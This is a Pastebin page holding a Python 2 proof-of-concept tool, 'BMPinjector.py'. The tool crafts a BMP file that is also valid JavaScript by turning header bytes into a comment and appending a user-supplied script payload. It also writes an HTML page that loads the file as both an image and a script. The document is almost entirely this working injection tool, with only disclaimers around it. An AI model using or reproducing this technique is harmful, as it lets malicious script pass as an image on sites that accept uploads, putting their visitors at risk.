Guest User

BMPinjector.py

a guest
Oct 22nd, 2013
8,453
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python2
  2. #============================================================================================================#
  3. #======= Simply injects a JavaScript Payload into a BMP. ====================================================#
  4. #======= The resulting BMP must be a valid (not corrupted) BMP. =============================================#
  5. #======= Author: marcoramilli.blogspot.com ==================================================================#
  6. #======= Version: PoC (don't even think to use it in development env.) ======================================#
  7. #======= Disclaimer: ========================================================================================#
  8. #THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR
  9. #IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
  10. #WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
  11. #DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
  12. #INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
  13. #(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
  14.                                 #SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
  15.                                 #HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
  16. #STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
  17. #IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
  18. #POSSIBILITY OF SUCH DAMAGE.
  19. #===========================================================================================================#
  20. import argparse
  21. import os
  22.  
  23. #---------------------------------------------------------
  24. def _hexify(num):
  25.     """
  26.     Converts and formats to hexadecimal
  27.     """
  28.     num = "%x" % num
  29.     if len(num) % 2:
  30.         num = '0'+num
  31.     return num.decode('hex')
  32.  
  33. #---------------------------------------------------------
  34. #Example payload: "var _0xe428=[\""+ b'\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64' + "\"]
  35. #;alert(_0xe428[0]);"
  36. def _generate_and_write_to_file(payload, fname):
  37.     """
  38.     Generates a fake but valid BMP within scriting
  39.     """
  40.     f = open(fname, "wb")
  41.     header = (b'\x42\x4D'  #Signature BM
  42.                         b'\x2F\x2A\x00\x00' #Header File size, but encoded as /* <-- Yes it's a valid header
  43.                         b'\x00\x00\x00\x00' #Reserved
  44.                         b'\x00\x00\x00\x00' #bitmap data offset
  45.                         b''+ _hexify( len(payload) ) + #bitmap header size
  46.                       b'\x00\x00\x00\x14' #width 20pixel .. it's up to you
  47.                         b'\x00\x00\x00\x14' #height 20pixel .. it's up to you
  48.                       b'\x00\x00' #nb_plan 
  49.                         b'\x00\x00' #nb per pixel
  50.                         b'\x00\x10\x00\x00' #compression type
  51.                         b'\x00\x00\x00\x00' #image size .. its ignored
  52.                         b'\x00\x00\x00\x01' #Horizontal resolution
  53.                         b'\x00\x00\x00\x01' #Vertial resolution
  54.                         b'\x00\x00\x00\x00' #number of colors
  55.                         b'\x00\x00\x00\x00' #number important colors
  56.                         b'\x00\x00\x00\x80' #palet colors to be complient
  57.                         b'\x00\x80\xff\x80' #palet colors to be complient
  58.                         b'\x80\x00\xff\x2A' #palet colors to be complient
  59.                         b'\x2F\x3D\x31\x3B' #*/=1;
  60.                         )
  61.     # I made this explicit, step by step .
  62.     f.write(header)
  63.     f.write(payload)
  64.     f.close()
  65.     return True
  66.  
  67. #---------------------------------------------------------
  68. def _generate_launching_page(f):
  69.     """
  70.     Creates the HTML launching page
  71.     """
  72.  
  73.     htmlpage ="""
  74.                                 <html>
  75.                                 <head><title>Opening an image</title> </head>
  76.                                 <body>
  77.                                     <img src=\"""" + f + """\"\>
  78.                                     <script src= \"""" + f + """\"> </script>
  79.                                 </body>
  80.                                 </html>
  81.                         """
  82.     html = open("run.html", "wb")
  83.     html.write(htmlpage);
  84.     html.close()
  85.     return True
  86.  
  87. #---------------------------------------------------------
  88. def _inject_into_file(payload, fname):
  89.     """
  90.     Injects the payload into existing BMP
  91.     NOTE: if the BMP contains \xFF\x2A might caouse issues
  92.     """
  93.     # I know, I can do it all in memory and much more fast.
  94.     # I wont do it here.
  95.     f = open(fname, "r+b")
  96.     b = f.read()
  97.     b.replace(b'\x2A\x2F',b'\x00\x00')
  98.     f.close()
  99.  
  100.     f = open(fname, "w+b")
  101.     f.write(b)
  102.     f.seek(2,0)
  103.     f.write(b'\x2F\x2A')
  104.     f.close()
  105.  
  106.     f = open(fname, "a+b")
  107.     f.write(b'\xFF\x2A\x2F\x3D\x31\x3B')
  108.     f.write(payload)
  109.     f.close()
  110.     return True
  111.  
  112.  
  113. #---------------------------------------------------------
  114. if __name__ == "__main__":
  115.     parser = argparse.ArgumentParser()
  116.     parser.add_argument("filename",help="the bmp file name to be generated/or infected")
  117.     parser.add_argument("js_payload",help="the payload to be injected. For exmample: \"alert(\"test\");\"")
  118.     parser.add_argument("-i", "--inject-to-existing-bmp", action="store_true", help="inject into the current bitmap")
  119.     args = parser.parse_args()
  120.     print("""
  121.                     |======================================================================================================|
  122.                     | [!] legal disclaimer: usage of this tool for injecting malware to be propagated is illegal.          |
  123.                     | It is the end user's responsibility to obey all applicable local, state and federal laws.            |
  124.                     | Authors assume no liability and are not responsible for any misuse or damage caused by this program  |
  125.                     |======================================================================================================|
  126.                     """)
  127.     if args.inject_to_existing_bmp:
  128.          _inject_into_file(args.js_payload, args.filename)
  129.     else:
  130.         _generate_and_write_to_file(args.js_payload, args.filename)
  131.    
  132.     _generate_launching_page(args.filename)
  133.     print "[+] Finished!"
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×